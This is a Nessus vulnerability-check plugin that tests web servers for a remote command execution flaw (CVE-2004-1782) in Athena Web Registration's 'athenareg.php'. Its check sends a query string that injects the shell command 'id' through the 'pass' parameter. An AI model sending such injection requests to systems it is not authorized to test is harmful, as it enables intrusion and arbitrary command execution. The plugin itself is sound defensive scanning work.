#
# This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
# Ref: Peter Kieser
# This script is released under the GNU GPL v2
#

 desc = "
Synopsis : 

The remote web server contains a PHP script that allows arbitrary
command execution. 

Description :

The remote host is running Athena Web server.

The remote version of this software allows for execution of arbitrary
commands through the script 'athenareg.php'.  A malicious user could
exploit this issue to execute arbitrary commands on the remote host. 

Solution: 

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";

if(description)
{
 script_id(18376);
 script_version("$Revision: 1.7 $");

 script_bugtraq_id(9349);
 script_cve_id("CVE-2004-1782");
 script_xref(name:"OSVDB", value:"16861");
  
 name["english"] = "Athena Web Registration remote command execution flaw";
 script_name(english:name["english"]);
 
 script_description(english:desc);
 
 summary["english"] = "Checks for Athena Web Registration remote command execution flaw";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2005 David Maciejak");
 family["english"] = "CGI abuses";
 script_family(english:family["english"]);
 script_dependencie("http_version.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);


http_check_remote_code (
			check_request:"/athenareg.php?pass=%20;id",
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id",
			description:desc,
			port:port
			);
